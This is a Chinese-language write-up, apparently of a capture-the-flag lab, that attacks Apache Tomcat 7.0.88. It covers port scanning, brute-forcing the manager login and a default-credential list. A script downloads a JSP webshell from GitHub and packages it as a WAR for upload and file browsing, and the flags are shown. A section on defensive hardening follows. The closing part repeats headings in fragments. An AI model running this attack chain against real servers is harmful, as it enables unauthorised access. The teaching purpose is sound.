Tomcat用户暴力破解与war包webshell上传攻击分析<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>

使用masscan进行快速端口扫描：<\/p>

sudo masscan -p1-65535 10.10.10.95 --rate=<\/span>1000<\/span> -e tun0 > \/tmp\/ports
<\/span><\/span><\/code><\/pre>使用nmap进行详细服务识别：<\/p>
ports=<\/span>$(<\/span>cat \/tmp\/ports | awk -F " "<\/span> '{print $4}'<\/span> | awk -F "\/"<\/span> '{print $1}'<\/span> | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>
<\/span><\/span>nmap -p$ports 10.10.10.95 --min-rate 1000<\/span> -sC -sV -Pn
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

8080\/tcp: Apache Tomcat\/Coyote JSP engine 1.1<\/li>
版本: Apache Tomcat\/7.0.88<\/li>
<\/ul>
2. Tomcat管理界面暴力破解<\/h2>
2.1 使用爆破工具<\/h3>
使用开源工具进行Tomcat管理界面密码爆破：<\/p>
python3 apache-tomcat-login-bruteforce.py -H 10.10.10.95
<\/span><\/span><\/code><\/pre>成功爆破出的密码: s3cret<\/code><\/p>
2.2 Tomcat默认凭证<\/h3>
常见Tomcat默认凭证组合：<\/p>

tomcat:tomcat<\/li>
admin:admin<\/li>
both:manager<\/li>
role1:tomcat<\/li>
root:root<\/li>
<\/ul>
3. WAR包webshell制作与上传<\/h2>
3.1 制作WAR包webshell<\/h3>
创建gen_war.sh<\/code>脚本：<\/p>
#!\/bin\/sh
<\/span><\/span><\/span><\/span>wget https:\/\/raw.githubusercontent.com\/tennc\/webshell\/master\/jsp\/jspbrowser\/Browser.jsp -O index.jsp
<\/span><\/span>rm -rf wshell
<\/span><\/span>rm -f wshell.war
<\/span><\/span>mkdir wshell
<\/span><\/span>cp index.jsp wshell\/
<\/span><\/span>cd wshell
<\/span><\/span>jar -cvf ..\/wshell.war *
<\/span><\/span><\/code><\/pre>执行脚本生成WAR包：<\/p>
chmod +x gen_war.sh
<\/span><\/span>.\/gen_war.sh
<\/span><\/span><\/code><\/pre>3.2 上传WAR包<\/h3>
通过Tomcat管理界面的"WAR file to deploy"功能上传生成的wshell.war<\/code>文件。<\/p>
4. 利用webshell获取flag<\/h2>
4.1 访问webshell<\/h3>
上传成功后，访问webshell路径：<\/p>
http:\/\/10.10.10.95:8080\/wshell\/
<\/code><\/pre>
4.2 文件浏览功能<\/h3>
利用webshell的文件浏览功能查看系统文件：<\/p>
http:\/\/10.10.10.95:8080\/wshell\/?sort=1&file=C%3A%5CUsers%5CAdministrator%5CDesktop%5Cflags%5C2+for+the+price+of+1.txt
<\/code><\/pre>
4.3 获取flag<\/h3>

User.txt: 7004dbcef0f854e0fb401875f26ebd00<\/code><\/li>
Root.txt: 04a8b36e1545a455393d067e772fe90e<\/code><\/li>
<\/ul>
5. 防御措施<\/h2>
5.1 防止暴力破解<\/h3>

修改Tomcat默认管理用户名和密码<\/li>
启用账户锁定机制<\/li>
限制管理界面访问IP<\/li>
使用强密码策略<\/li>
<\/ul>
5.2 防止WAR包上传攻击<\/h3>

禁用不必要的上传功能<\/li>
对上传文件进行严格校验<\/li>
限制WAR包部署权限<\/li>
定期审计部署的应用<\/li>
<\/ul>
5.3 系统加固<\/h3>

及时更新Tomcat版本<\/li>
删除或保护默认示例应用<\/li>
配置适当的文件系统权限<\/li>
启用日志审计和监控<\/li>
<\/ul>
6. 总结<\/h2>
本案例展示了通过Tomcat管理界面暴力破解和WAR包webshell上传的完整攻击链。攻击者首先通过端口扫描发现Tomcat服务，然后暴力破解管理密码，最后上传恶意WAR包获取系统权限。防御此类攻击需要多层次的防护措施，包括强认证机制、最小权限原则和持续的安全监控。<\/p>

Tomcat用户暴力破解与war包webshell上传攻击分析<\/h1>

1. 信息收集阶段<\/h2>

2. Tomcat管理界面暴力破解<\/h2>

3. WAR包webshell制作与上传<\/h2>

3.2 上传WAR包<\/h3> 通过Tomcat管理界面的"WAR file to deploy"功能上传生成的wshell.war<\/code>文件。<\/p>

5. 防御措施<\/h2>

3.2 上传WAR包<\/h3>
通过Tomcat管理界面的"WAR file to deploy"功能上传生成的`wshell.war<\/code>文件。<\/p>`